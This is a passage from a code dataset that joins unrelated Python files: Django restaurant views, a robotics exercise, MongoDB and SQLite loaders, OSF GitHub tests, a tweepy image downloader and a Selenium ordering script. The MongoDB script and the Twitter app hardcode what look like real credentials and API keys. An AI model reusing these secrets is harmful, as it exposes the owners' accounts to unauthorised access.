\"There was a problem updating\")\n context = {\n \"form\": form,\n \"r_form\": r_form,\n \"user_profile\": user_profile,\n \"restaurant\": restaurant,\n }\n return render(request, \"core/restaurant_profile.html\", context)\n\n\nclass RestaurantDetailView(DetailView):\n model = Restaurant\n template_name = \"core/restaurant_detail.html\"\n context_object_name = \"restaurant\"\n\n def get_object(self):\n restaurant = get_object_or_404(\n Restaurant, restaurant_slug=self.kwargs.get(\"restaurant_slug\")\n )\n return restaurant\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"categories\"] = Category.objects.filter(\n restaurant=self.get_object()\n ).prefetch_related(\n Prefetch(\"food_items\", queryset=FoodItem.objects.filter(is_available=True))\n )\n context[\"opening_hours\"] = OpeningHour.objects.filter(\n restaurant=self.get_object()\n )\n today_date = date.today()\n today = 
today_date.isoweekday()\n context[\"current_opening_hours\"] = OpeningHour.objects.filter(\n restaurant=self.get_object(), day=today\n )\n\n try:\n context[\"cart_items\"] = Cart.objects.filter(\n user=self.request.user,\n )\n except:\n context[\"cart_items\"] = []\n return context\n\n\nclass SearchView(View):\n def get(self, request, *args, **kwargs):\n if \"address\" not in request.GET:\n return redirect(\"core:restaurant_list\")\n else:\n keyword = request.GET.get(\"keyword\")\n user_address = request.GET.get(\"address\")\n latitude = request.GET.get(\"lat\")\n longitude = request.GET.get(\"lng\")\n radius = request.GET.get(\"radius\")\n\n food_items = FoodItem.objects.filter(\n food_title__icontains=keyword, is_available=True\n )\n restaurants_ids = food_items.values_list(\"restaurant\", flat=True)\n restaurant_list = Restaurant.objects.filter(\n Q(id__in=restaurants_ids)\n | Q(\n restaurant_name__icontains=keyword,\n is_approved=True,\n user__is_active=True,\n )\n )\n if latitude and longitude and radius:\n pnt = GEOSGeometry(f\"POINT({longitude} {latitude})\", srid=4326)\n restaurant_list = (\n Restaurant.objects.filter(\n Q(id__in=restaurants_ids)\n | Q(\n restaurant_name__icontains=keyword,\n is_approved=True,\n user__is_active=True,\n ),\n user_profile__location__distance_lte=(pnt, D(km=radius)),\n )\n .annotate(distance=Distance(\"user_profile__location\", pnt))\n .order_by(\"distance\")\n )\n\n for restaurant in restaurant_list:\n restaurant.kms = round(restaurant.distance.km, 1)\n\n context = {\"restaurant_list\": restaurant_list, \"user_address\": user_address}\n return render(request, \"core/restaurant_list.html\", context)\n\n\nclass OpeningHoursView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n opening_hours = OpeningHour.objects.filter(restaurant=get_restaurant(request))\n form = OpeningHourForm\n context = {\"form\": form, \"opening_hours\": opening_hours}\n return render(request, \"core/opening_hours.html\", context)\n\n\nclass AddOpeningHourView(LoginRequiredMixin, View):\n def post(self, request, *args, **kwargs):\n if request.headers.get(\"x-requested-with\") == \"XMLHttpRequest\":\n day = request.POST.get(\"day\")\n from_hour = request.POST.get(\"from_hour\")\n to_hour = request.POST.get(\"to_hour\")\n is_closed = request.POST.get(\"is_closed\")\n try:\n opening_hour = OpeningHour.objects.create(\n restaurant=get_restaurant(request),\n day=day,\n from_hour=from_hour,\n to_hour=to_hour,\n is_closed=is_closed,\n )\n if opening_hour:\n day = OpeningHour.objects.get(id=opening_hour.id)\n if day.is_closed:\n return JsonResponse(\n {\n \"status\": \"Success\",\n \"id\": opening_hour.id,\n \"day\": day.get_day_display(),\n \"is_closed\": \"Closed\",\n }\n )\n else:\n return JsonResponse(\n {\n \"status\": \"Success\",\n \"id\": opening_hour.id,\n \"day\": day.get_day_display(),\n \"from_hour\": day.from_hour,\n \"to_hour\": day.to_hour,\n }\n )\n except IntegrityError as e:\n return JsonResponse(\n {\n \"status\": \"Failed\",\n \"message\": f\"{from_hour} to {to_hour} already exists for this day!\",\n }\n )\n else:\n HttpResponse(\"Invalid Request\")\n\n\nclass RemoveOpeningHourView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n if request.headers.get(\"x-requested-with\") == \"XMLHttpRequest\":\n hour_id = self.kwargs.get(\"hour_id\")\n hour = get_object_or_404(OpeningHour, id=hour_id)\n hour.delete()\n return JsonResponse({\"status\": \"Success\", \"id\": hour_id})\n\n\nclass CustomerProfileView(LoginRequiredMixin, 
View):\n def get(self, request, *args, **kwargs):\n user_profile = get_object_or_404(UserProfile, user=request.user)\n form = UserInfoForm(instance=request.user)\n up_form = UserProfileForm(instance=user_profile)\n context = {\"form\": form, \"up_form\": up_form, \"user_profile\": user_profile}\n return render(request, \"core/customer_profile.html\", context)\n\n def post(self, request, *args, **kwargs):\n user_profile = get_object_or_404(UserProfile, user=request.user)\n form = UserInfoForm(request.POST, instance=request.user)\n up_form = UserProfileForm(request.POST, request.FILES, instance=user_profile)\n if form.is_valid() and up_form.is_valid():\n form.save()\n up_form.save()\n messages.success(request, \"Your profile was updated successfully!\")\n return redirect(\"accounts:dashboard\")\n else:\n messages.error(request, \"There was a problem updating your profile\")\n context = {\"form\": form, \"up_form\": up_form, \"user_profile\": user_profile}\n return render(request, \"core/customer_profile.html\", context)\n\n\nclass CheckoutView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n cart_items = Cart.objects.filter(user=request.user)\n if cart_items.count() < 1:\n return redirect(\"core:restaurant_list\")\n user_profile = UserProfile.objects.get(user=request.user)\n\n default_values = {\n \"first_name\": request.user.first_name,\n \"last_name\": request.user.last_name,\n \"email\": request.user.email,\n \"address\": user_profile.address,\n \"phone_no\": request.user.phone_no,\n \"city\": user_profile.city,\n \"state\": user_profile.state,\n \"country\": user_profile.country,\n \"pin_code\": user_profile.pin_code,\n }\n form = CheckoutForm(initial=default_values)\n context = {\"form\": form, \"cart_items\": cart_items}\n return render(request, \"core/checkout.html\", context)\n\n\nclass RestaurantOrdersView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n restaurant = Restaurant.objects.get(user=request.user)\n orders = Order.objects.filter(restaurants__in=[restaurant.id], is_ordered=True)\n context = {\"orders\": orders}\n return render(request, \"core/restaurant_orders.html\", context)\n","repo_name":"Sheharyar123/Restaurant-Website","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29972584534","text":"\nfrom roblib import * # available at https://www.ensta-bretagne.fr/jaulin/roblib.py\n\ndef f(x,u):\n x=x.flatten()\n u=u.flatten()\n return (array([[x[3]*cos(x[2])], [x[3]*sin(x[2])], [u[0]],[u[1]]]))\n \n \n \ndef control(x,w,dw,ddw):\n u=array([[0],[0]]) #TO DO\n return u \n\n\nax=init_figure(-30,30,-30,30)\ndt = 0.02\nx = array([[10],[0],[1],[1]])\nu = array([[1],[1]])\nL=10\ns = arange(0,2*pi,0.01)\nfor t in arange(0,10,dt) :\n clear(ax)\n plot(L*cos(s), L*sin(3*s),color='magenta')\n draw_tank(x,'red') \n w=array([[0],[0]]) #TO DO\n dw=array([[0],[0]]) #TO DO\n ddw=array([[0],[0]]) #TO DO\n u=control(x,w,dw,ddw)\n draw_disk(w,0.5,ax,\"red\") \n x = x + dt*f(x,u)\n\n\n\n\n \n\n \n\n\n\n \n \n \n\n","repo_name":"CoralieEscande/Exercices2Moocs","sub_path":"RobMooc/Programmes de démarrage pour les utilisateurs de Python/2.08__sliding.py","file_name":"2.08__sliding.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17006480672","text":"import pymongo\n\nclient = 
pymongo.MongoClient(\"mongodb://lohith369:Mongo369@ac-qn6cw65-shard-00-00.onq988i.mongodb.net:27017,ac-qn6cw65-shard-00-01.onq988i.mongodb.net:27017,ac-qn6cw65-shard-00-02.onq988i.mongodb.net:27017/?ssl=true&replicaSet=atlas-vkjq5c-shard-0&authSource=admin&retryWrites=true&w=majority\")\ndb = client.test\nprint(db)\n\nd = {\n \"Name\" : \"Lohith\",\n \"Age\" : 30,\n \"Email\" : \"lohith@gmail.com\",\n \"Address\" : \"bangalore\"\n}\n\nd = {\n \"Name\" : \"Lohith\",\n \"Age\" : 30,\n \"Email\" : \"lohith@gmail.com\",\n \"Address\" : \"bangalore\"\n}\n\nd = {\n \"Name\" : \"Lohith\",\n \"Age\" : 30,\n \"Email\" : \"lohith@gmail.com\",\n \"Address\" : \"bangalore\"\n}\ndb1 = client['mongggtest']\ncollection = db1['test']\ncollection.insert_one(d)","repo_name":"Lohithkc/mongotest","sub_path":"Testdb.py","file_name":"Testdb.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2017362090","text":"from typing import Callable, Dict, Optional, Union\nimport numpy as np\nfrom gensim.test.utils import common_texts\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.decomposition import PCA, TruncatedSVD\nfrom scipy import stats\n\nfrom base import detectorParent\nfrom baseModels import baseModels \nfrom sampling import samplingData\n\nclass embedding(samplingData, detectorParent):\n def __init__(self, *args, **kwargs):\n \"\"\"\n In this class, we turn the samples of text inputs into text embeddings, which we can then use\n to a) either construct distributions, or b) calculate drift on. There are many different kinds \n of text embeddings and encodings. In this class, we cover 3 umbrella embeddings (discussed below)\n \n Returns\n ---------- \n A dictionary containing the embeddings as decided by the choice of embedding model and drift detection test type\n \"\"\"\n super(embedding, self).__init__(*args, **kwargs)\n \n def sampleData(self):\n \"\"\"\n Call the samplingData class to construct samples from the input data provided by the user\n\n Returns\n ---------- \n Dictionary with samples for reference and comparison data (or streams of comparison data).\n \"\"\"\n if self.sample_dict is None:\n return samplingData.samples(self)\n else:\n return self.sample_dict\n \n def embed_data(self):\n \"\"\"\n Embeds text inherited from the sampling class. 
The type of embedding (Doc2Vec, SBERT etc) is\n decided by the user\n\n Returns\n ---------- \n A dictionary containing the embeddings as decided by the choice of embedding model and drift detection test type\n \"\"\"\n sample_dict = self.sampleData()\n data_ref = sample_dict[0]\n \n # need to look into what sort of data to inlude in tagged documents (for now just the first X text pieces)\n bases = baseModels(data = data_ref[:self.sample_size], sample_size = self.sample_size, \n SBERT_model = self.SBERT_model)\n emb_dict = {}\n\n if self.embedding_model == \"Doc2Vec\":\n model = bases.doc2vec_base()\n for i in range(len(sample_dict)):\n emb_dict[i] = model.infer_vector(sample_dict[i])\n elif self.embedding_model == \"SBERT\":\n model = bases.sbert_base()\n for i in range(len(sample_dict)):\n emb_dict[i] = model.encode(sample_dict[i])\n elif self.embedding_model == \"USE\":\n model = bases.use_base()\n for i in range(len(sample_dict)):\n emb_dict[i] = np.array(model(sample_dict[i]))\n else:\n print(\"The model is not defined\")\n return emb_dict \n \n # only required for KS Test (which does not get to Distributions which is where we actually do iterations)\n def embed_data_iters(self):\n \"\"\"\n Runs the embedding function \"iterations\" number of times, if the selected drift detection test\n is the KS Test. For KL and JS Divergence, the iterations are taken care of in the distributions\n class\n \n Returns\n ---------- \n A dictionary containing the embeddings as decided by the choice of embedding model and drift detection test type\n \"\"\"\n emb_dict = {}\n for i in range(self.iterations):\n temp_dict = self.embed_data()\n emb_dict[i] = temp_dict\n return emb_dict\n\n # constructed with SBERT in mind\n def dim_reduction(self,\n emb_dict: Optional[dict] = None,\n components: Optional[int] = 25,\n n_iters: Optional[int] = 7):\n \"\"\"\n Embeds text inherited from the sampling class.\n\n Args\n ---------- \n emb_dict: dictionary\n Dictionary of embeddings as returned by the embed_data method\n component: int (optional)\n The number top components we want from PCA or SVD\n n_iters: int\n\n Returns\n ---------- \n a dictionary containing the embeddings as decided by the choice of embedding model and \n drift detection test type\n \"\"\"\n\n emb_dict = self.embed_data()\n if self.transformation == \"PCA\":\n model = PCA(n_components=components)\n elif self.transformation == \"SVD\":\n model = TruncatedSVD(n_components=components, n_iter= n_iters, random_state=42)\n else: \n print(\"The following dimension reudction technique is not yet supported\")\n '''\n Doc2Vec is a little more complicated so we will skip dim-reduction with it for now\n '''\n # only looking at the first iteration for now\n final_dict = {}\n for window in range(len(emb_dict)):\n model.fit(emb_dict[window].T)\n final_data = np.asarray(model.components_).T\n final_dict[window] = final_data\n return final_dict\n \n def final_embeddings(self):\n \"\"\"\n Returns\n ---------- \n a dictionary containing the embeddings as decided by the choice of embedding model and \n drift detection test type\n \"\"\"\n if self.embedding_model == \"Doc2Vec\":\n if self.test == \"KS\":\n return self.embed_data_iters()\n elif self.test in [\"KL\", \"JS\"]:\n return self.embed_data()\n else:\n print(\"This test is not included in the package as yet\")\n elif self.embedding_model in [\"SBERT\", \"USE\"]:\n if self.transformation is None:\n return self.embed_data()\n else:\n return self.dim_reduction()\n else:\n print(\"This embedding is not part of 
the package as yet.\")\n","repo_name":"akshitasingh0706/NaturallyDrifted","sub_path":"src/featureLevelDetectors/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35592801643","text":"from pathlib import Path\nimport sqlite3\nimport pandas as pd\n\n# Create a sqlite db\nPath('my_data.db').touch()\n\n# create sqlite connection\nconn = sqlite3.connect('my_data.db')\nc = conn.cursor()\n\n# load data to db\ncategories = pd.read_csv('data/BigSupplyCo_Categories.csv')\ncategories.to_sql('categories', conn, index=False)\n\ncustomers = pd.read_csv('data/BigSupplyCo_Customers.csv')\ncustomers.to_sql('customers', conn, index=False)\n\ndepartments = pd.read_csv('data/BigSupplyCo_Departments.csv')\ndepartments.to_sql('departments', conn, index=False)\n\norders = pd.read_csv('data/BigSupplyCo_Orders.csv', encoding='latin-1')\norders.to_sql('orders', conn, index=False)\n\nproducts = pd.read_csv('data/BigSupplyCo_Products.csv')\nproducts.to_sql('products', conn, index=False)","repo_name":"Hoomaaan/RetailStore-Chatbot","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14150308567","text":"# -*- coding: utf-8 -*-\nimport httplib as http\nimport mock\nfrom nose.tools import assert_equal, assert_false\nimport pytest\nimport unittest\n\nfrom tests.base import OsfTestCase, get_default_metaschema\nfrom osf_tests.factories import ProjectFactory, UserFactory, AuthUserFactory\n\nfrom github3.repos.branch import Branch\n\nfrom framework.auth import Auth\n\nfrom addons.base.tests.views import (\n    OAuthAddonAuthViewsTestCaseMixin, OAuthAddonConfigViewsTestCaseMixin\n)\nfrom addons.github.tests.utils import create_mock_github, GitHubAddonTestCase\nfrom addons.github.tests.factories import GitHubAccountFactory\n\nfrom addons.github import utils\nfrom addons.github.api import GitHubClient\nfrom addons.github.serializer import GitHubSerializer\n\npytestmark = pytest.mark.django_db\n\n\nclass TestGitHubAuthViews(GitHubAddonTestCase, OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):\n\n    @mock.patch(\n        'addons.github.models.UserSettings.revoke_remote_oauth_access',\n        mock.PropertyMock()\n    )\n    def test_delete_external_account(self):\n        super(TestGitHubAuthViews, self).test_delete_external_account()\n\n\nclass TestGitHubConfigViews(GitHubAddonTestCase, OAuthAddonConfigViewsTestCaseMixin, OsfTestCase):\n    folder = None\n    Serializer = GitHubSerializer\n    client = GitHubClient\n\n    ## Overrides ##\n\n    def setUp(self):\n        super(TestGitHubConfigViews, self).setUp()\n        self.mock_api_user = mock.patch('addons.github.api.GitHubClient.user')\n        self.mock_api_user.return_value = mock.Mock()\n        self.mock_api_user.start()\n\n    def tearDown(self):\n        self.mock_api_user.stop()\n        super(TestGitHubConfigViews, self).tearDown()\n\n    def test_folder_list(self):\n        # GH only lists root folder (repos), this test is superfluous\n        pass\n\n    @mock.patch('addons.github.models.NodeSettings.add_hook')\n    @mock.patch('addons.github.views.GitHubClient.repo')\n    def test_set_config(self, mock_repo, mock_add_hook):\n        # GH selects repos, not folders, so this needs to be overridden\n        mock_repo.return_value = 'repo_name'\n        url = self.project.api_url_for('{0}_set_config'.format(self.ADDON_SHORT_NAME))\n        res = self.app.post_json(url, {\n            'github_user': 'octocat',\n            'github_repo': 
'repo_name',\n }, auth=self.user.auth)\n assert_equal(res.status_code, http.OK)\n self.project.reload()\n assert_equal(\n self.project.logs.latest().action,\n '{0}_repo_linked'.format(self.ADDON_SHORT_NAME)\n )\n mock_add_hook.assert_called_once()\n\n\n# TODO: Test remaining CRUD methods\n# TODO: Test exception handling\nclass TestCRUD(OsfTestCase):\n\n def setUp(self):\n super(TestCRUD, self).setUp()\n self.github = create_mock_github(user='fred', private=False)\n self.user = AuthUserFactory()\n self.consolidated_auth = Auth(user=self.user)\n self.project = ProjectFactory(creator=self.user)\n self.project.add_addon('github', auth=self.consolidated_auth)\n self.project.creator.add_addon('github')\n self.node_settings = self.project.get_addon('github')\n self.node_settings.user_settings = self.project.creator.get_addon('github')\n # Set the node addon settings to correspond to the values of the mock repo\n self.node_settings.user = self.github.repo.return_value.owner.login\n self.node_settings.repo = self.github.repo.return_value.name\n self.node_settings.save()\n\n\nclass TestGithubViews(OsfTestCase):\n\n def setUp(self):\n super(TestGithubViews, self).setUp()\n self.user = AuthUserFactory()\n self.consolidated_auth = Auth(user=self.user)\n\n self.project = ProjectFactory(creator=self.user)\n self.non_authenticator = UserFactory()\n self.project.add_contributor(\n contributor=self.non_authenticator,\n auth=self.consolidated_auth,\n )\n self.project.creator.add_addon('github')\n self.project.creator.external_accounts.add(GitHubAccountFactory())\n self.project.creator.save()\n self.project.save()\n self.project.add_addon('github', auth=self.consolidated_auth)\n\n self.github = create_mock_github(user='fred', private=False)\n\n self.node_settings = self.project.get_addon('github')\n self.node_settings.user_settings = self.project.creator.get_addon('github')\n # Set the node addon settings to correspond to the values of the mock repo\n self.node_settings.user = self.github.repo.return_value.owner.login\n self.node_settings.repo = self.github.repo.return_value.name\n self.node_settings.save()\n\n def _get_sha_for_branch(self, branch=None, mock_branches=None):\n github_mock = self.github\n if mock_branches is None:\n mock_branches = github_mock.branches\n if branch is None: # Get default branch name\n branch = self.github.repo.return_value.default_branch\n for each in mock_branches.return_value:\n if each.name == branch:\n branch_sha = each.commit.sha\n return branch_sha\n\n # Tests for _get_refs\n @mock.patch('addons.github.api.GitHubClient.branches')\n @mock.patch('addons.github.api.GitHubClient.repo')\n def test_get_refs_defaults(self, mock_repo, mock_branches):\n github_mock = self.github\n mock_repo.return_value = github_mock.repo.return_value\n mock_branches.return_value = github_mock.branches.return_value\n branch, sha, branches = utils.get_refs(self.node_settings)\n\n\nclass TestRegistrationsWithGithub(OsfTestCase):\n\n def setUp(self):\n\n super(TestRegistrationsWithGithub, self).setUp()\n self.project = ProjectFactory()\n self.consolidated_auth = Auth(user=self.project.creator)\n\n self.project.add_addon('github', auth=self.consolidated_auth)\n self.project.creator.add_addon('github')\n self.node_settings = self.project.get_addon('github')\n self.user_settings = self.project.creator.get_addon('github')\n self.node_settings.user_settings = self.user_settings\n self.node_settings.user = 'Queen'\n self.node_settings.repo = 'Sheer-Heart-Attack'\n self.node_settings.save()\n\n\nclass 
TestGithubSettings(OsfTestCase):\n\n def setUp(self):\n\n super(TestGithubSettings, self).setUp()\n self.github = create_mock_github(user='fred', private=False)\n self.project = ProjectFactory()\n self.auth = self.project.creator.auth\n self.consolidated_auth = Auth(user=self.project.creator)\n\n self.project.add_addon('github', auth=self.consolidated_auth)\n self.project.creator.add_addon('github')\n self.node_settings = self.project.get_addon('github')\n self.user_settings = self.project.creator.get_addon('github')\n self.node_settings.user_settings = self.user_settings\n self.node_settings.user = 'Queen'\n self.node_settings.repo = 'Sheer-Heart-Attack'\n self.node_settings.save()\n\n @mock.patch('addons.github.models.NodeSettings.add_hook')\n @mock.patch('addons.github.api.GitHubClient.repo')\n def test_link_repo(self, mock_repo, mock_add_hook):\n github_mock = self.github\n mock_repo.return_value = github_mock.repo.return_value\n\n url = self.project.api_url + 'github/settings/'\n self.app.post_json(\n url,\n {\n 'github_user': 'queen',\n 'github_repo': 'night at the opera',\n },\n auth=self.auth\n ).maybe_follow()\n\n self.project.reload()\n self.node_settings.reload()\n\n assert_equal(self.node_settings.user, 'queen')\n assert_equal(self.node_settings.repo, 'night at the opera')\n assert_equal(self.project.logs.latest().action, 'github_repo_linked')\n mock_add_hook.assert_called_once()\n\n @mock.patch('addons.github.models.NodeSettings.add_hook')\n @mock.patch('addons.github.api.GitHubClient.repo')\n def test_link_repo_no_change(self, mock_repo, mock_add_hook):\n github_mock = self.github\n mock_repo.return_value = github_mock.repo.return_value\n\n log_count = self.project.logs.count()\n\n url = self.project.api_url + 'github/settings/'\n self.app.post_json(\n url,\n {\n 'github_user': 'Queen',\n 'github_repo': 'Sheer-Heart-Attack',\n },\n auth=self.auth\n ).maybe_follow()\n\n self.project.reload()\n self.node_settings.reload()\n\n assert_equal(self.project.logs.count(), log_count)\n assert_false(mock_add_hook.called)\n\n @mock.patch('addons.github.api.GitHubClient.repo')\n def test_link_repo_non_existent(self, mock_repo):\n\n mock_repo.return_value = None\n\n url = self.project.api_url + 'github/settings/'\n res = self.app.post_json(\n url,\n {\n 'github_user': 'queen',\n 'github_repo': 'night at the opera',\n },\n auth=self.auth,\n expect_errors=True\n ).maybe_follow()\n\n assert_equal(res.status_code, 400)\n\n @mock.patch('addons.github.api.GitHubClient.branches')\n def test_link_repo_registration(self, mock_branches):\n\n mock_branches.return_value = [\n Branch.from_json({\n 'name': 'master',\n 'commit': {\n 'sha': '6dcb09b5b57875f334f61aebed695e2e4193db5e',\n 'url': 'https://api.github.com/repos/octocat/Hello-World/commits/c5b97d5ae6c19d5c5df71a34c7fbeeda2479ccbc',\n }\n }),\n Branch.from_json({\n 'name': 'develop',\n 'commit': {\n 'sha': '6dcb09b5b57875asdasedawedawedwedaewdwdass',\n 'url': 'https://api.github.com/repos/octocat/Hello-World/commits/cdcb09b5b57875asdasedawedawedwedaewdwdass',\n }\n })\n ]\n\n registration = self.project.register_node(\n schema=get_default_metaschema(),\n auth=self.consolidated_auth,\n data=''\n )\n\n url = registration.api_url + 'github/settings/'\n res = self.app.post_json(\n url,\n {\n 'github_user': 'queen',\n 'github_repo': 'night at the opera',\n },\n auth=self.auth,\n expect_errors=True\n ).maybe_follow()\n\n assert_equal(res.status_code, 400)\n\n @mock.patch('addons.github.models.NodeSettings.delete_hook')\n def test_deauthorize(self, 
mock_delete_hook):\n\n        url = self.project.api_url + 'github/user_auth/'\n\n        self.app.delete(url, auth=self.auth).maybe_follow()\n\n        self.project.reload()\n        self.node_settings.reload()\n        assert_equal(self.node_settings.user, None)\n        assert_equal(self.node_settings.repo, None)\n        assert_equal(self.node_settings.user_settings, None)\n\n        assert_equal(self.project.logs.latest().action, 'github_node_deauthorized')\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"Rheisen/osf.io","sub_path":"addons/github/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"3198368928","text":"# -*- coding: utf-8 -*-\nimport tweepy\nimport datetime\nimport logging\nimport sys\nimport json\nimport os\nimport requests\nimport webbrowser\nfrom time import sleep\nfrom flask import Flask, session, redirect, render_template, request\n\n# Keys\nCK = 'wOEXhlK7izfzBN40d6kzFfk6F'\nCS = 'wyvYrU0XVsLJjrXTVYuVqIVenXuMkXf4AHZ3q6Nuz4v4BXc94g'\nauth = tweepy.OAuthHandler(CK, CS)\n# Number of tweets to fetch, max: 200\ncount = 200\n\n#\nverifier = None\ntaco = None\n\n# Directory where downloaded images are saved\nIMAGES_DIR = 'path'\n\n# Flask setup\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\napi = tweepy.API(auth)\n\n# Access to the root URL\n@app.route('/', methods=['GET'])\ndef main():\n    redirect_url = auth.get_authorization_url()\n    session['request_token'] = auth.request_token\n    return redirect(redirect_url)\n\n# Access to /likes\n@app.route('/likes')\ndef likes():\n    global verifier\n    if verifier is None:\n        token = session.pop('request_token', None)\n        verifier = request.args.get('oauth_verifier')\n        auth.request_token = token\n        auth.get_access_token(verifier)\n        session.pop('oauth_verifier', None)\n        verifier = None\n\n    fav = api.favorites(count = count)\n    return render_template('likes.html', fav=fav)\n\n# Access to /liked\n@app.route('/liked', methods=['POST'])\ndef liked():\n    global taco\n    taco = request.form['taco']\n    fav = api.favorites(taco, count = count)\n    return render_template('likes.html', taco=taco, fav=fav)\n\n# Access to /like\n@app.route('/like')\ndef like():\n    id = request.args.get('id')\n    api.create_favorite(id)\n    return redirect('javascript:history.go(-1)')\n\n# Access to /retweet\n@app.route('/retweet')\ndef retweet():\n    id = request.args.get('id')\n    api.retweet(id)\n    return redirect('javascript:history.go(-1)')\n\n# Save button\n@app.route('/save')\ndef index2():\n    global taco\n    fav = api.favorites(taco, count = count)\n    for result in fav:\n        # Twitter ID\n        screen_name = result.user.screen_name\n        # Tweet timestamp (converted from UTC to JST)\n        jst = result.created_at + datetime.timedelta(hours=9)\n        time_str = jst.strftime('%Y-%m%d-%H%M%S')\n        # Does the tweet have media attached?\n        if 'media' in result.entities:\n            # Save the images\n            i = 0\n            for media in result.extended_entities['media']:\n                url = media['media_url_https']\n                i += 1\n                filename = IMAGES_DIR + time_str + '_' + screen_name + str(i) + '.' 
+ url.split('.')[-1]\n\n                # Download the image at :orig size\n                res = requests.get(url+ ':orig')\n                with open(os.path.join(filename), 'wb') as fp:\n                    fp.write(res.content)\n    return redirect('/liked')\n\n# Start the web server\nif __name__ == '__main__':\n    app.run(debug = False)\n","repo_name":"awzhak/Twipic","sub_path":"twiapp.py","file_name":"twiapp.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7841664075","text":"from id3 import run\n\nchosen = int(input(\"Which test do you want to run?\\n[1] for weather.csv\\n[2] for restaurant.csv\\n[3] for iris.csv\\n\"))\nif(chosen == 1):\n    run('weather')\nelif(chosen == 2):\n    run('restaurant')\nelse:\n    run('iris')\n    ","repo_name":"MatheusRodriguesBezerra/InteligenciaArtificial","sub_path":"trabalho3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6020458760","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome()\n\n\ntry:\n    # Open the site\n    driver.get(\"https://shop.foodsoul.pro/\")\n\n    # Click the pickup option\n    pickup = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (By.XPATH, \"/html/body/div[4]/div/div/div/ul/li[2]\")\n        )\n    )\n    pickup.click()\n    print('Clicked \"Pickup\"')\n\n    # Click the first shopping mall\n    shop_cent = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (\n                By.XPATH,\n                \"/html/body/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div[2]/div/div/div/ul/li[1]\",\n            )\n        )\n    )\n    shop_cent.click()\n    print('Clicked \"Mall\"')\n\n    # Click the account button\n    account = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (\n                By.CSS_SELECTOR,\n                \"#topBar > div > div > div.topbar__menu > div > div > div.popover__relative > button\",\n            )\n        )\n    )\n    account.click()\n    print('Clicked \"Account\"')\n\n    # Click the \"telegram\" button\n    telegram = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (\n                By.CSS_SELECTOR,\n                \"#topBar > div > div > div.topbar__menu > div > div > div.popover__content > form > \"\n                \"div.login-ways > div > \"\n                \"button.button.position-relative.d-inline-flex.align-items-center.overflow-hidden.outline\"\n                \"-none.cursor-pointer.us-none.button--default.button--large.button--custom.button\"\n                \"--uppercase.button--expanded > div\",\n            )\n        )\n    )\n    telegram.click()\n    print('Clicked \"Telegram\"')\n\n    # Captcha\n    while True:\n        try:\n            WebDriverWait(driver, 7).until(\n                EC.presence_of_element_located(\n                    (By.XPATH, \"/html/body/div[4]/div[2]/iframe\")\n                )\n            )\n\n            input('A captcha appeared, solve it and then press \"Enter\" ')\n\n            # Click the \"telegram\" button\n            telegram = WebDriverWait(driver, 10).until(\n                EC.presence_of_element_located(\n                    (\n                        By.CSS_SELECTOR,\n                        \"#topBar > div > div > div.topbar__menu > div > div > div.popover__content > form > \"\n                        \"div.login-ways > div > \"\n                        \"button.button.position-relative.d-inline-flex.align-items-center.overflow-hidden\"\n                        \".outline\"\n                        \"-none.cursor-pointer.us-none.button--default.button--large.button--custom.button\"\n                        \"--uppercase.button--expanded\",\n                    )\n                )\n            )\n            telegram.click()\n            print('Clicked \"Telegram\"')\n            break\n\n        except Exception as ex:\n            print(\"Captcha not found\")\n            break\n\n    # 
Click the \"open\" button\n    butt_open = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (\n                By.CSS_SELECTOR,\n                \"#topBar > div > div > div.topbar__menu > div > div > div.popover__content > div > a\",\n            )\n        )\n    )\n    butt_open.click()\n    print('Clicked \"Open\"')\n\n    # The user manually logs in via telegram\n    input(\n        \"Log in via telegram, make sure you are signed in to the account, then press Enter \"\n    )\n\n    # Scroll the page to the restaurant menu\n    iframe = WebDriverWait(driver, 10).until(\n        EC.presence_of_element_located(\n            (\n                By.CSS_SELECTOR,\n                \"#recommendrecommend > div > div:nth-child(1) > div.product__wrapper > div.product-menu > \"\n                \"div.product-actions > button > div\",\n            )\n        )\n    )\n    ActionChains(driver).scroll_to_element(iframe).perform()\n    print(\"scrolled to the element\")\n\n    # Add the product to the cart\n    product_add 